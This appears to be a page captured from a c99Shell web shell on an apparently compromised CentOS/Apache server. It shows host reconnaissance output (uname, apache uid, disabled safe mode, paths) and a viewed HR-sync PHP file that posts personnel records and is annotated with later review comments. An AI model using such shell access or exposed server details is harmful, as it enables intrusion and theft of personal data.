!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/includes/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)


Viewing file:     cURL.php (8.22 KB)      -rw-r--r--
<?php

require_once("../configuration.php");
require_once(
"../includes/connMySQL.class.php");

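// Read the department id once at include time; every sync helper in this
// file sends it to the remote endpoint as the 'deptId' field.
// The assignment operators were missing from the captured listing and are
// restored here so the statements parse.
$conn = new DBConn();

// Constant query text: no caller-supplied value is concatenated into it.
$sql = "select deptId from dev_config";
$result = $conn->execQuery($sql);
$rs = $conn->fetchObject($result);

// An empty dev_config table would leave $rs without a row; fall back to null
// instead of dereferencing a non-object.
// NOTE(review): assumes fetchObject() yields a falsy value when no row exists - confirm in connMySQL.class.php.
$deptId = $rs ? $rs->deptId : null;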

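/**
 * Check whether the host in $_Config_curl_ip accepts a TCP connection on port 80.
 *
 * The probe waits at most 5 seconds. The argument separators were missing from
 * the captured listing and are restored here.
 *
 * NOTE(review): the probe targets port 80, which suggests the sync endpoint is
 * reached over plain HTTP. The payloads built in this file carry names, birth
 * dates and salary fields; confirm that $_Config_curl_path is an https:// URL.
 *
 * @return bool True when the connection could be opened, false otherwise.
 */
function curlTestConnection(){

    global $_Config_curl_ip;

    $errno = 0;
    $errstr = '';

    $socket = fsockopen($_Config_curl_ip, 80, $errno, $errstr, 5);
    if($socket === false) return false;

    // The original never closed the probe socket; release it explicitly so the
    // handle does not stay open for the rest of the request.
    fclose($socket);

    return true;
}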

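/**
 * POST a set of form fields to the endpoint configured in $_Config_curl_path.
 *
 * The request is only attempted when curlTestConnection() succeeds. The
 * assignment operators, argument separators and one closing parenthesis were
 * missing from the captured listing and are restored here.
 *
 * @param array|string $postfields Flat field => value map, or an already encoded request body.
 * @return bool True only when the response body compares equal to 1, false in every other case.
 */
function cURL($postfields){

    global $_Config_curl_path;

    // No point building a request when the reachability probe fails.
    if(!curlTestConnection()) return false;

    // The page banner reports PHP/5.1.6. On PHP releases before 5.5 an array
    // handed to CURLOPT_POSTFIELDS treats any value that begins with '@' as the
    // path of a local file to upload. Encoding the fields into a urlencoded
    // string keeps every value literal, whatever a form field contains.
    // NOTE(review): this changes the request body from multipart/form-data to
    // application/x-www-form-urlencoded - confirm the receiving script reads
    // the fields the same way.
    if(is_array($postfields)){
        $pairs = array();
        foreach($postfields as $field => $value){
            // Unset values are sent as empty fields, not dropped.
            $pairs[] = urlencode((string) $field) . '=' . urlencode((string) $value);
        }
        $postfields = implode('&', $pairs);
    }

    $ch = curl_init();
    if($ch === false) return false;

    curl_setopt($ch, CURLOPT_URL, $_Config_curl_path);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
    // Return the body instead of printing it, so it can be inspected below.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    $response = curl_exec($ch);
    curl_close($ch);

    // curl_exec() returns false on a transport failure.
    if($response === false) return false;

    // NOTE(review): the loose comparison is kept from the original, so any body
    // that PHP converts to the number 1 counts as success. Tighten it once the
    // exact reply of the endpoint is known.
    return ($response == 1);
}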

//------- HR Person -------//
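/**
 * Send one HR person record to the remote endpoint with status "hrPerson".
 *
 * Every parameter is forwarded unchanged under a field of the same name; the
 * global $deptId is added as 'deptId'. The parameter separators and the
 * assignment before the cURL() call were missing from the captured listing and
 * are restored here.
 *
 * NOTE(review): the record holds personal data (name, birth date, salary).
 * Nothing in this function validates the values - presumably the callers do;
 * verify.
 *
 * @return bool Result of cURL(): true when the endpoint acknowledged the record.
 */
function hrPersonCurl($perid, $Teacher_code, $id, $pcode, $fname, $lname, $birthdate, $sex, $appointdate, $startdate, $fperson, $statusId, $posid, $poscode, $levelcode, $salary, $cercode, $cerid, $fposition, $deptcode, $tcode, $workcode, $Dev_type, $schstartdate, $schstopdate){

    global $deptId;

    // Field order is kept as in the original listing.
    $postfields = array(
        'perid'        => $perid,
        'deptId'       => $deptId,
        'Teacher_code' => $Teacher_code,
        'id'           => $id,
        'pcode'        => $pcode,
        'fname'        => $fname,
        'lname'        => $lname,
        'birthdate'    => $birthdate,
        'sex'          => $sex,
        'appointdate'  => $appointdate,
        'startdate'    => $startdate,
        'fperson'      => $fperson,
        'statusId'     => $statusId,
        'posid'        => $posid,
        'poscode'      => $poscode,
        'levelcode'    => $levelcode,
        'salary'       => $salary,
        'cercode'      => $cercode,
        'cerid'        => $cerid,
        'fposition'    => $fposition,
        'deptcode'     => $deptcode,
        'tcode'        => $tcode,
        'workcode'     => $workcode,
        'Dev_type'     => $Dev_type,
        'schstartdate' => $schstartdate,
        'schstopdate'  => $schstopdate,
        'status'       => "hrPerson",
    );

    return cURL($postfields);
}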

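/**
 * Ask the remote endpoint to delete an HR person record (status "deleteHrPerson").
 *
 * The assignment before the cURL() call was missing from the captured listing
 * and is restored here.
 *
 * NOTE(review): the person id is sent under the key 'HiseduId', while
 * checkHrPersonCurl() sends it as 'perid'. This looks like a copy from the
 * education helpers; the key is left unchanged because the receiving script is
 * not visible - confirm which name it expects.
 *
 * @param mixed $perid Identifier of the person record to delete.
 * @return bool Result of cURL().
 */
function deleteHrPersonCurl($perid){

    global $deptId;

    $postfields = array(
        'HiseduId' => $perid,
        'deptId'   => $deptId,
        'status'   => "deleteHrPerson",
    );

    return cURL($postfields);
}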

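/**
 * Send a "checkHrPerson" request for one person id to the remote endpoint.
 *
 * The assignment before the cURL() call was missing from the captured listing
 * and is restored here.
 *
 * @param mixed $perid Identifier of the person record to check.
 * @return bool Result of cURL().
 */
function checkHrPersonCurl($perid){

    global $deptId;

    $postfields = array(
        'perid'  => $perid,
        'deptId' => $deptId,
        'status' => "checkHrPerson",
    );

    return cURL($postfields);
}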

//------- HR Education -------//
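/**
 * Send one HR education record to the remote endpoint with status "hrEdu".
 *
 * Every parameter is forwarded unchanged under a field of the same name; the
 * global $deptId is added as 'deptId'. The parameter separators and the
 * assignment before the cURL() call were missing from the captured listing and
 * are restored here.
 *
 * @return bool Result of cURL().
 */
function hrEduCurl($HiseduId, $perid, $levelPos, $levelHig, $levelcode, $qcode, $qname, $Major, $institute, $univId, $countrycode, $startdeerdate, $enddeerdate, $eyear, $qflag, $mflag){

    global $deptId;

    // Field order is kept as in the original listing.
    $postfields = array(
        'HiseduId'      => $HiseduId,
        'deptId'        => $deptId,
        'perid'         => $perid,
        'levelPos'      => $levelPos,
        'levelHig'      => $levelHig,
        'levelcode'     => $levelcode,
        'qcode'         => $qcode,
        'qname'         => $qname,
        'Major'         => $Major,
        'institute'     => $institute,
        'univId'        => $univId,
        'countrycode'   => $countrycode,
        'startdeerdate' => $startdeerdate,
        'enddeerdate'   => $enddeerdate,
        'eyear'         => $eyear,
        'qflag'         => $qflag,
        'mflag'         => $mflag,
        'status'        => "hrEdu",
    );

    return cURL($postfields);
}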

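/**
 * Ask the remote endpoint to delete an HR education record (status "deleteHrEdu").
 *
 * The assignment before the cURL() call was missing from the captured listing
 * and is restored here.
 *
 * @param mixed $HiseduId Identifier of the education record to delete.
 * @return bool Result of cURL().
 */
function deleteHrEduCurl($HiseduId){

    global $deptId;

    $postfields = array(
        'HiseduId' => $HiseduId,
        'deptId'   => $deptId,
        'status'   => "deleteHrEdu",
    );

    return cURL($postfields);
}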

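/**
 * Send a "checkHrEdu" request for one education record to the remote endpoint.
 *
 * The assignment before the cURL() call was missing from the captured listing
 * and is restored here.
 *
 * @param mixed $HiseduId Identifier of the education record to check.
 * @return bool Result of cURL().
 */
function checkHrEduCurl($HiseduId){

    global $deptId;

    $postfields = array(
        'HiseduId' => $HiseduId,
        'deptId'   => $deptId,
        'status'   => "checkHrEdu",
    );

    return cURL($postfields);
}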

//------- HR His -------//
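/**
 * Send one HR training-history record to the remote endpoint with status "hrHis".
 *
 * Parameters are forwarded unchanged under fields of the same name; the global
 * $deptId is added as 'deptId'. The parameter separators and the assignment
 * before the cURL() call were missing from the captured listing and are
 * restored here.
 *
 * Two fields in the original read variables that do not exist in this
 * function:
 *  - 'Training_code' was filled from $appointdate, so the $Training_code
 *    argument was never sent. It now carries $Training_code.
 *  - 'schstartdate' was filled from $schstartdate, which is not a parameter.
 *    The field is still sent, explicitly empty, so the set of fields stays
 *    the same.
 *
 * @return bool Result of cURL().
 */
function hrHisCurl($HisId, $Teacher_code, $perid, $Date, $No_in, $Dated, $cname, $orders, $Training_code, $startdate, $enddate, $daycount, $day, $Year_std, $traincenter, $provcode, $countrycode, $univId, $unit, $moneybudget1, $moneybudget2, $moneybudget3, $moneybudget4, $money, $Training_std, $moneycenter, $Content, $unitpoint, $Skills, $cdevcode, $Orgskills, $Groskills, $Perskills, $Hiskills, $Training_type, $traindept){

    global $deptId;

    // Field order is kept as in the original listing.
    $postfields = array(
        'HisId'         => $HisId,
        'deptId'        => $deptId,
        'Teacher_code'  => $Teacher_code,
        'perid'         => $perid,
        'Date'          => $Date,
        'No_in'         => $No_in,
        'Dated'         => $Dated,
        'cname'         => $cname,
        'orders'        => $orders,
        'Training_code' => $Training_code,
        'startdate'     => $startdate,
        'enddate'       => $enddate,
        'daycount'      => $daycount,
        'day'           => $day,
        'Year_std'      => $Year_std,
        'traincenter'   => $traincenter,
        'provcode'      => $provcode,
        'countrycode'   => $countrycode,
        'univId'        => $univId,
        'unit'          => $unit,
        'moneybudget1'  => $moneybudget1,
        'moneybudget2'  => $moneybudget2,
        'moneybudget3'  => $moneybudget3,
        'moneybudget4'  => $moneybudget4,
        // NOTE(review): no source value exists in this function; sent empty as before.
        'schstartdate'  => '',
        'money'         => $money,
        'Training_std'  => $Training_std,
        'moneycenter'   => $moneycenter,
        'Content'       => $Content,
        'unitpoint'     => $unitpoint,
        'Skills'        => $Skills,
        'cdevcode'      => $cdevcode,
        'Orgskills'     => $Orgskills,
        'Groskills'     => $Groskills,
        'Perskills'     => $Perskills,
        'Hiskills'      => $Hiskills,
        'Training_type' => $Training_type,
        'traindept'     => $traindept,
        'status'        => "hrHis",
    );

    return cURL($postfields);
}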

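/**
 * Ask the remote endpoint to delete an HR history record (status "deleteHrHis").
 *
 * The assignment before the cURL() call was missing from the captured listing
 * and is restored here.
 *
 * @param mixed $HisId Identifier of the history record to delete.
 * @return bool Result of cURL().
 */
function deleteHrHisCurl($HisId){

    global $deptId;

    $postfields = array(
        'HisId'  => $HisId,
        'deptId' => $deptId,
        'status' => "deleteHrHis",
    );

    return cURL($postfields);
}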

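/**
 * Send a "checkHrHis" request for one history record to the remote endpoint.
 *
 * The assignment before the cURL() call was missing from the captured listing
 * and is restored here.
 *
 * @param mixed $HisId Identifier of the history record to check.
 * @return bool Result of cURL().
 */
function checkHrHisCurl($HisId){

    global $deptId;

    $postfields = array(
        'HisId'  => $HisId,
        'deptId' => $deptId,
        'status' => "checkHrHis",
    );

    return cURL($postfields);
}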

//------- CourseEDU -------//
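/**
 * Send one course/education record to the remote endpoint with status "courseEdu".
 *
 * Every parameter is forwarded unchanged under a field of the same name; the
 * global $deptId is added as 'deptId'. The parameter separators and the
 * assignment before the cURL() call were missing from the captured listing and
 * are restored here.
 *
 * @return bool Result of cURL().
 */
function courseEduCurl($educosId, $perid, $Certificates, $Course, $univName, $countryname, $startdate, $enddate, $Expertise, $ExpertiseDetail, $Flag){

    global $deptId;

    // Field order is kept as in the original listing.
    $postfields = array(
        'educosId'        => $educosId,
        'deptId'          => $deptId,
        'perid'           => $perid,
        'Certificates'    => $Certificates,
        'Course'          => $Course,
        'univName'        => $univName,
        'countryname'     => $countryname,
        'startdate'       => $startdate,
        'enddate'         => $enddate,
        'Expertise'       => $Expertise,
        'ExpertiseDetail' => $ExpertiseDetail,
        'Flag'            => $Flag,
        'status'          => "courseEdu",
    );

    return cURL($postfields);
}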

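/**
 * Ask the remote endpoint to delete a course/education record (status "deleteCourseEdu").
 *
 * The assignment before the cURL() call was missing from the captured listing
 * and is restored here.
 *
 * @param mixed $educosId Identifier of the course record to delete.
 * @return bool Result of cURL().
 */
function deleteCourseEduCurl($educosId){

    global $deptId;

    $postfields = array(
        'educosId' => $educosId,
        'deptId'   => $deptId,
        'status'   => "deleteCourseEdu",
    );

    return cURL($postfields);
}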

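/**
 * Send a "checkCourseEdu" request for one course record to the remote endpoint.
 *
 * The assignment before the cURL() call was missing from the captured listing
 * and is restored here.
 *
 * @param mixed $educosId Identifier of the course record to check.
 * @return bool Result of cURL().
 */
function checkCourseEduCurl($educosId){

    global $deptId;

    $postfields = array(
        'educosId' => $educosId,
        'deptId'   => $deptId,
        'status'   => "checkCourseEdu",
    );

    return cURL($postfields);
}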

?>


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0168 ]--